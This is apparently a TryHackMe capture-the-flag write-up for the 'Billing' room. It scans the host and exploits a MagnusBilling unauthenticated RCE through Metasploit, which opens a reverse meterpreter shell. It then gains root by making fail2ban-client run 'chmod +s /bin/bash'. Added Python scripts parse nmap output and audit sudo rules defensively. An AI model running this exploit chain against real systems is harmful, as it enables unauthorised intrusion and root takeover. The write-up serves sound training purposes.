Billing
- 🌐 Website: TryHackMe
- 🔥 Level: Easy
- 🖥️ OS: Linux
- 🔗 Link: Billing
Foothold
Target: 10.10.153.225
Let's start with an nmap:
nmap --min-rate=10000 10.10.153.225 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:08 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00064s latency).
All 65535 scanned ports on ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225) are filtered
MAC Address: 02:C7:75:C5:29:71 (Unknown)
That doesn't seem to work (every port reports as filtered). Let's try a SYN scan at the default rate:
root@ip-10-10-214-237:~# sudo nmap -sS 10.10.153.225
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:09 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 02:C7:75:C5:29:71 (Unknown)
There are 3 open ports, and brute force is out of scope. Let's run nmap with default scripts and version detection:
root@ip-10-10-214-237:~# sudo nmap -sC -sV -sS 10.10.153.225 -p22,80,3306
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:11 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: MagnusBilling
|_Requested resource was http://ip-10-10-153-225.eu-west-1.compute.internal/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
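The first scan came back with every port filtered, while the slower scan found three open ports. As an added example (not part of the original writeup), here is a small Python parser for nmap's normal output that extracts open ports, versions and the entries the http-robots.txt script reported, and that flags an all-ports-filtered result as inconclusive rather than treating it as a clean host. The two sample scans are constructed from the output shown above; the regexes and the wording of the assessment are assumptions of this example.

```python
"""Parse nmap 'normal' output into structured results and detect the
all-ports-filtered failure mode seen in the first scan.

Added example, not from the original writeup. The sample scans below are
constructed from the scan output shown on the page.
"""
import re

# Constructed sample: the -p- scan that returned nothing useful.
FAST_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:08 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00064s latency).
All 65535 scanned ports on ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225) are filtered
MAC Address: 02:C7:75:C5:29:71 (Unknown)
"""

# Constructed sample: the -sC -sV scan of the three open ports.
SCRIPT_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:11 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: MagnusBilling
|_Requested resource was http://ip-10-10-153-225.eu-west-1.compute.internal/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "22/tcp open ssh OpenSSH ..." -> port, proto, state, service, optional version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# The sentinel line nmap prints when no port answered differently from the rest.
ALL_FILTERED_RE = re.compile(r"^All (\d+) scanned ports .* are filtered$")


def parse_nmap(text):
    """Return a dict with 'all_filtered' (count or None), 'ports' and
    'robots_disallowed' (paths listed under the http-robots.txt script)."""
    result = {"all_filtered": None, "ports": [], "robots_disallowed": []}
    in_robots = False
    for line in text.splitlines():
        m = ALL_FILTERED_RE.match(line)
        if m:
            result["all_filtered"] = int(m.group(1))
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            result["ports"].append({"port": int(port), "proto": proto, "state": state,
                                    "service": service, "version": version or ""})
            in_robots = False
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()  # strip the NSE output tree prefix
            if body.startswith("http-robots.txt:"):
                in_robots = True       # following "/path" lines are disallowed entries
                continue
            if in_robots and body.startswith("/"):
                result["robots_disallowed"].append(body)
                continue
            in_robots = False          # any other script line ends the robots block
    return result


def assess(parsed):
    """An all-filtered result says nothing about the host; treat it as a scan
    to repeat (slower, or with a different probe) rather than as 'no services'."""
    if parsed["all_filtered"] is not None and not parsed["ports"]:
        return "inconclusive: all %d ports filtered; rescan at a lower rate" % parsed["all_filtered"]
    open_ports = [p["port"] for p in parsed["ports"] if p["state"] == "open"]
    return "open ports: " + ",".join(str(p) for p in open_ports)


if __name__ == "__main__":
    print(assess(parse_nmap(FAST_SCAN)))
    parsed = parse_nmap(SCRIPT_SCAN)
    print(assess(parsed))
    print("robots.txt disallows:", parsed["robots_disallowed"])
```

Run it on a saved `nmap -oN` file by reading the file into `parse_nmap`; the robots.txt entries it returns are exactly the paths the scan already told you about, so this is a triage aid, not a new probe.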
There is a robots.txt on the website; its disallowed entry is the path the website redirects to. Looking at the website I can see that it is MagnusBilling software. I searched online and saw a Metasploit module for an unauthenticated RCE. Let's try it.
User Access
msf6 > search magnus
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Let's use it!
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.214.237:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.153.225:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.153.225
[+] Deleted kbkUHRIhGAZGeHTh.php
[*] Meterpreter session 1 opened (10.10.214.237:4444 -> 10.10.153.225:57952) at 2025-07-02 09:24:30 +0100
meterpreter >
Answer
user.txt is in the /home/magnus folder
Privilege Escalation
Let's check whether asterisk can run something as root:
asterisk@ip-10-10-153-225:/home/magnus$ sudo -l
sudo -l
Matching Defaults entries for asterisk on ip-10-10-153-225:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-153-225:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
asterisk@ip-10-10-153-225:/home/magnus$
Fail2Ban v1.0.2 reads log files that contain password failure reports and bans the corresponding IP addresses using firewall rules.
Since the jail actions are commands executed by the root daemon, let's try to set a custom ban command on a fail2ban jail:
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ sudo fail2ban-client status
Status
|- Number of jail: 8
`- Jail list: ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$
sudo fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod +s /bin/bash'"
sudo fail2ban-client set sshd banip 127.0.0.1
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ /bin/bash -p
/bin/bash -p
bash-5.2# whoami
whoami
root
bash-5.2#
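The rule that made this possible is the passwordless sudo entry for the whole fail2ban-client binary, whose jail actions are shell commands run by the root daemon. As an added example, not the room's, Fail2Ban's or sudo's own code, the following Python audits `sudo -l` output for such entries and checks file modes for a setuid shell, the artefact `chmod +s /bin/bash` leaves on disk. The weak `sudo -l` sample is the output shown above; the hardened sample, the COMMAND_RUNNERS table and the file-mode entries are constructed assumptions of this example.

```python
"""Audit 'sudo -l' output for passwordless rules that hand root to a user, and
look for the setuid-shell artefact this kind of abuse leaves behind.

Added example, not part of the original writeup or of Fail2Ban/sudo.
SUDO_L_WEAK is the sudo -l output shown on the page; SUDO_L_HARDENED, the
COMMAND_RUNNERS table and the file entries are constructed.
"""
import os
import re
import stat

SUDO_L_WEAK = r"""
Matching Defaults entries for asterisk on ip-10-10-153-225:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-10-153-225:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
"""

# Constructed: what sudo -l would show if the rule were limited to one read-only
# subcommand (sudoers line: asterisk ALL=(root) NOPASSWD: /usr/bin/fail2ban-client status).
SUDO_L_HARDENED = """
User asterisk may run the following commands on ip-10-10-153-225:
    (root) NOPASSWD: /usr/bin/fail2ban-client status
"""

# Binaries whose ordinary configuration interface runs shell commands as the
# daemon user (root). fail2ban-client is the one from the page: jail actions
# such as actionban are commands the root daemon executes on ban.
COMMAND_RUNNERS = {
    "/usr/bin/fail2ban-client": "jail actions (e.g. actionban) are shell commands run by the root daemon",
}

# "(runas) TAG: TAG: command, command" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return the command rules from sudo -l output as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(", "):
            rules.append({"runas": runas.strip(),
                          "nopasswd": "NOPASSWD:" in tags,
                          "command": cmd.strip()})
    return rules


def audit(rules):
    """Rate each rule; returns (severity, command, reason) tuples."""
    findings = []
    for r in rules:
        cmd = r["command"]
        binary = cmd.split(" ", 1)[0]
        args_restricted = " " in cmd   # sudoers only matches the exact argument list given
        if cmd == "ALL":
            findings.append(("critical", cmd, "any command as root"))
        elif binary in COMMAND_RUNNERS and not args_restricted:
            findings.append(("high", cmd, COMMAND_RUNNERS[binary]))
        elif r["nopasswd"]:
            findings.append(("info", cmd,
                             "passwordless; confirm the allowed arguments cannot reach a command-running feature"))
    return findings


SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}


def setuid_shells(entries):
    """entries: iterable of (path, st_mode). A setuid shell is what
    'chmod +s /bin/bash' leaves behind; 'bash -p' keeps that effective uid."""
    return [path for path, mode in entries if path in SHELLS and mode & stat.S_ISUID]


def live_shell_entries():
    """(path, mode) pairs for the shells present on this host."""
    out = []
    for path in sorted(SHELLS):
        try:
            out.append((path, os.stat(path).st_mode))
        except FileNotFoundError:
            pass
    return out


if __name__ == "__main__":
    for name, text in (("weak", SUDO_L_WEAK), ("hardened", SUDO_L_HARDENED)):
        print(name, audit(parse_sudo_l(text)))
    print("setuid shells on this host:", setuid_shells(live_shell_entries()))
```

The hardened sample shows the fix a defender would apply: sudoers matches the exact argument list, so granting `/usr/bin/fail2ban-client status` lets the account read jail status without being able to change an action. On a live host, `setuid_shells(live_shell_entries())` is a quick post-incident check for the modified `/bin/bash`.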
Answer
Root's flag is in root's folder